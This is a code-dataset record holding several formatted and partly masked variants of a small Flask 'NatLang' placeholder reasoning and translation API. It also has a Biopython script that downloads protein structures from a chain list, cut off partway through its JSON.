to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = 0, 1, 0
VERSION_STRING = '{}.{}.{}'.format(*VERSION)
LANG_ID = 'lang.natural.english'
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
@app.route('/api/{}/reason'.format(VERSION_STRING))
def reason_base():
return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',
'reasonEnglish', 'Manually reason with natural language.']]})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get('extraInfo')
new_goal = old_goal.copy()
new_goal['data'] = new_goal_data
new_goal['language'] = LANG_ID
print(new_goal)
return new_goal
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = (0, 1, 0)
VERSION_STRING = "{}.{}.{}".format(*VERSION)
LANG_ID = "lang.natural.english"
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route("/")
def entry():
return jsonify([{
"id": "com.natlang",
"name": "NatLang",
"website": "https://aaron.stockdill.nz/",
"version": VERSION_STRING,
"description": "A placeholder natural language reasoner.",
"icon": "",
"base": "http://aarons-macbook.local:5003/api/{}".format(VERSION_STRING),
"provides": {
"reason": "/reason",
"translate": "/translate"
}
}])
@app.route("/api/{}/reason".format(VERSION_STRING))
def reason_base():
return jsonify({
"result": "success",
"reasoning": [[LANG_ID, "manual", "reasonEnglish", "Manually reason with natural language."]]
})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get("extraInfo")
new_goal = old_goal.copy()
new_goal["data"] = new_goal_data
new_goal["language"] = LANG_ID
print(new_goal)
return new_goal
@app.route("/api/{}/reason/apply".format(VERSION_STRING), methods=["GET", "POST"])
def reason_apply():
rule_id = request.args.get("id")
if rule_id == "reasonEnglish":
json_data = request.get_json()
new_goal = common_transform(json_data, "goal")
return jsonify({
"result": "success",
"newGoals": [new_goal] if new_goal["data"] else []
})
else:
return jsonify({
"result": "failure",
"reason": "Unknown rule ID."
})
@app.route("/api/{}/translate".format(VERSION_STRING))
def translate_base():
other_languages = ["lang.speedith", "lang.isabelle"]
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield (x, y)
yield (y, x)
return jsonify({
"result": "success",
"translations": [(from_lang, to_lang, "manual")
for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]
})
@app.route("/api/{}/translate/translate".format(VERSION_STRING), methods=["GET", "POST"])
def translate_apply():
from_language = request.args.get("from")
to_language = request.args.get("to")
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, "formula")
return jsonify({
"result": "success",
"formula": new_goal
})
else:
return jsonify({
"result": "failure",
"reason": "Unable to translate when one of the languages is not {}".format(LANG_ID)
})
if __name__ == "__main__":
app.run()
|
flexible
|
{
"blob_id": "49e1dc98ecc2e5c12c6e520721a6c0a7c2665cca",
"index": 3450,
"step-1": "<mask token>\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n<mask token>\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n<mask token>\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n 
format(LANG_ID)})\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\[email protected]('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email 
protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from flask import Flask, jsonify, make_response, request\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\[email protected]('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email 
protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "from flask import Flask, jsonify, make_response, request\n\n\napp = Flask(__name__)\n\nVERSION = (0, 1, 0)\nVERSION_STRING = \"{}.{}.{}\".format(*VERSION)\n\nLANG_ID = \"lang.natural.english\"\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected](\"/\")\ndef entry():\n return jsonify([{\n \"id\": \"com.natlang\",\n \"name\": \"NatLang\",\n \"website\": \"https://aaron.stockdill.nz/\",\n \"version\": VERSION_STRING,\n \"description\": \"A placeholder natural language reasoner.\",\n \"icon\": \"\",\n \"base\": \"http://aarons-macbook.local:5003/api/{}\".format(VERSION_STRING),\n \"provides\": {\n \"reason\": \"/reason\",\n \"translate\": \"/translate\"\n }\n }])\n\n\[email protected](\"/api/{}/reason\".format(VERSION_STRING))\ndef reason_base():\n return jsonify({\n \"result\": \"success\",\n \"reasoning\": [[LANG_ID, \"manual\", \"reasonEnglish\", \"Manually reason with natural language.\"]]\n })\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get(\"extraInfo\")\n new_goal = old_goal.copy()\n new_goal[\"data\"] = new_goal_data\n new_goal[\"language\"] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected](\"/api/{}/reason/apply\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef reason_apply():\n rule_id = request.args.get(\"id\")\n if rule_id == \"reasonEnglish\":\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"goal\")\n return jsonify({\n \"result\": \"success\",\n \"newGoals\": [new_goal] if new_goal[\"data\"] else []\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unknown rule ID.\"\n })\n\n\[email protected](\"/api/{}/translate\".format(VERSION_STRING))\ndef translate_base():\n other_languages = [\"lang.speedith\", \"lang.isabelle\"]\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield (x, y)\n yield (y, x)\n return jsonify({\n 
\"result\": \"success\",\n \"translations\": [(from_lang, to_lang, \"manual\")\n for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]\n })\n\n\[email protected](\"/api/{}/translate/translate\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef translate_apply():\n from_language = request.args.get(\"from\")\n to_language = request.args.get(\"to\")\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"formula\")\n return jsonify({\n \"result\": \"success\",\n \"formula\": new_goal\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unable to translate when one of the languages is not {}\".format(LANG_ID)\n })\n\nif __name__ == \"__main__\":\n app.run()\n",
"step-ids": [
4,
5,
9,
10,
11
]
}
|
[
4,
5,
9,
10,
11
] |
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
<|reserved_special_token_0|>
idx.readline()
<|reserved_special_token_0|>
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
pdbl = PDB.PDBList()
Error_out = open('microfolds_out.txt', 'w')
cng = 0
AA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',
'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']
CF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',
'UNX']
Metals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',
'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',
'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',
'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']
cofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']
idxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx = open(idxfile, 'r')
idx.readline()
EC = ''
i = 0
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
import Bio
import os
import sys
from Bio import PDB
from Bio.PDB import PDBIO
from Bio.PDB.PDBParser import PDBParser
import math
import numpy
from collections import Counter
import random
from Bio.PDB import *
import gzip
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
pdbl = PDB.PDBList()
Error_out = open('microfolds_out.txt', 'w')
cng = 0
AA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',
'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']
CF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',
'UNX']
Metals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',
'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',
'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',
'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']
cofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']
idxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx = open(idxfile, 'r')
idx.readline()
EC = ''
i = 0
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
import Bio
import os
import sys
from Bio import PDB
from Bio.PDB import PDBIO
from Bio.PDB.PDBParser import PDBParser
import math
import numpy
from collections import Counter
import random
from Bio.PDB import *
import gzip
def get_center(res_list):
coord = []
for atom in residue:
# print(atom.coord)
at=atom.coord
x=at[0]
y=at[1]
z=at[2]
atcord=[x,y,z]
coord.append(atcord)
x=0
y=0
z=0
i=0
for point in coord:
i=i+1
x=x+point[0]
y=y+point[1]
z=z+point[2]
x=x/i
y=y/i
z=z/i
center=numpy.array([x,y,z])
return center;
pdbl=PDB.PDBList()
Error_out=open("microfolds_out.txt","w")
cng=0
AA=['PHE','TRP','TYR','ALA','CYS','ASP','GLU','GLY','HIS','ILE','LYS','LEU','MET','ASN','PRO','GLN','ARG','SER','THR','VAL']
CF=[' DA',' DC',' DG',' DT',' A',' C',' G',' U','HOH','UNK','UNX']
Metals=['FE','MN','CU','CD','OS','CO','NI','W','PT','MO','U','TA','V','AU','IR','Y','GD','RU','YB','SM','PD','AG','EU','RH','PR','RE','LU','TB','HF','HO','DY','ZR','CR','LA','CE','ER','AM','CM','TH','PU','SC','PA']
cofactor=['BCB','CLA','CHL','BCL','CL0','PMR','PHO']
#organic_cofactors_list=[]
#organic_cofactors_pdb_file=open('manual_cofactor_list_with_quinone.txt','r')
#for line in organic_cofactors_pdb_file:
# line=line.split('\t')
# organic_cofactors_list.append(line[1][:-1])
idxfile='cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx=open(idxfile,"r")
idx.readline()
#idx.readline()
#idx.readline()
EC=""
i=0
for line in idx:
i=i+1
print(i)
try:
protein=line[0:4]
protein=protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir=os.getcwd()
pdbl.retrieve_pdb_file(protein,pdir=curdir+'/pdbs/')
#print (protein,'/home/hraanan/pdb_download/'+protein[1:3]+'/pdb'+protein+'.ent.gz')
#print ('unziping')
# gz = gzip.open(filename, 'rb')
# with open(final_file, 'wb') as out:
# out.writelines(gz)
# gz.close()
# #structure = parser.get_structure(protein,protein+'.pdb')
##
# #print ('unziping done')
# #os.remove(filename)
# pdbl.retrieve_pdb_file(protein)
# structure = parser.get_structure(protein,protein[1:3]+'/pdb'+protein+'.ent')
# head= structure.header['head']
# comp = structure.header['compound']
# EC==""
#
# try:
# comp=comp['1']
## except KeyError:
## try:
## EC=comp['ec_number']
## except KeyError:
## try:
## EC=comp['ec']
# except KeyError:
# EC='-.-.-.-'
# try:
# EC=comp['ec']
# except KeyError:
# pass
# try:
# EC=comp['ec_number']
# except KeyError:
# pass
# if EC=="":
# EC='-.-.-.-'
# #print(EC)
###
###
#
# sf4ID=[]
# sf4coord=[]
# for model in structure:
# if model.id==0:
# atom_list = Selection.unfold_entities(model, 'A') # A for atoms
# ns = NeighborSearch(atom_list)
# lig=[]
# for chain in model:
# for residue in chain:
# #if residue.resname not in AA and residue.resname not in CF :
# #print(chain.id,residue.resname)
# if residue.resname in organic_cofactors_list:
# #print(chain.id,residue.resname)
# atom_in_res=[]
# for atom in residue:
# atom_in_res.append(atom.element)
#
# #if any(x in Metals for x in atom_in_res)==False:
# #print ('not metal')
# # continue
#
# center = get_center(residue)
# #print ('center',center)
# lig=protein,chain.id,residue.id[1],residue.resname,center
# #print(lig)
# all_neighbors = ns.search(center, 15.0,"R") # 15.0 for distance in angstrom
# microfold_name=protein+'.'+residue.resname+'_'+ chain.id +'_'+str(residue.id[1])+'_'+head+'_'+EC
# microfold_name=microfold_name.replace(' ','')
# microfold_name=microfold_name.replace('/','_')
# microfold_dir=residue.resname
# microfold_dir=microfold_dir.replace(' ','')
# # print(microfold_name)
# if not os.path.exists('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir):
# os.makedirs('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir)
# Select = Bio.PDB.Select
# class MicroSelect(Select):
# def accept_residue(self, residue):
# if residue in all_neighbors and residue.resname!='HOH':
# return 1
# else:
# return 0
# io=PDBIO()
# io.set_structure(structure)
# #print('/home/hraanan/MicrofoldsPDBs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())
# io.save('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())
except:
# e = sys.exc_info()[0]
Error_out.write('xxx\n')
Error_out.write('/n' )
Error_out.write( "<p>Error: %s</p>" )
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
#prot.close()
print("end")
|
flexible
|
{
"blob_id": "8b29c12c294a8614d8be96c312ecffa9d3bcb3f8",
"index": 4575,
"step-1": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\n<mask token>\nidx.readline()\n<mask token>\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
"step-3": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\npdbl = PDB.PDBList()\nError_out = open('microfolds_out.txt', 'w')\ncng = 0\nAA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',\n 'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']\nCF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',\n 'UNX']\nMetals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',\n 'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',\n 'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',\n 'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']\ncofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']\nidxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\nidx = open(idxfile, 'r')\nidx.readline()\nEC = ''\ni = 0\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
